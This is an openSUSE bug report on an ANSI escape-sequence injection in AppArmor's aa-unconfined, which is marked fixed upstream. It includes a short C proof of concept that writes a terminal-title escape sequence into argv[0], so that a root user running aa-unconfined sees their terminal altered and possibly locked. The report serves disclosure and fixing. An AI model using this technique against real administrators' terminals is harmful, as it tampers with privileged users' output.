Bug 1219032 - ANSI terminal injection possible in aa-unconfined
Summary: ANSI terminal injection possible in aa-unconfined
Status: RESOLVED FIXED
Alias: None
Product: openSUSE Tumbleweed
Classification: openSUSE
Component: Security (show other bugs)
Version: Current
Hardware: Other Other
: P5 - None : Normal (vote)
Target Milestone: ---
Assignee: Security Team bot
QA Contact: E-mail List
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2024-01-20 17:45 UTC by Ricardo Branco
Modified: 2024-03-25 17:30 UTC (History)
0 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Ricardo Branco 2024-01-20 17:45:37 UTC 
Opened bug upstream: https://gitlab.com/apparmor/apparmor/-/issues/364

The following code displays a X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up.

The fix is not to trust cmdline in https://gitlab.com/apparmor/apparmor/-/blob/master/utils/aa-unconfined?ref_type=heads#L137 as proc(5) instructs.

$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>

int main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	int s;

	if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
		err(1, "socket()");

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;

	if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
		err(1, "bind()");

	strcpy(argv[0], "/\033]0;X\007");

	while (1)
		sleep(3600);
}
EOF

$ unset PROMPT_COMMAND

$ cc a.c

$ ./a.out &

$ sudo aa-unconfined
Comment 1 Ricardo Branco 2024-03-25 17:30:54 UTC 
Fixed upstream in https://gitlab.com/apparmor/apparmor/-/merge_requests/1142 and fix present in Tumbleweed.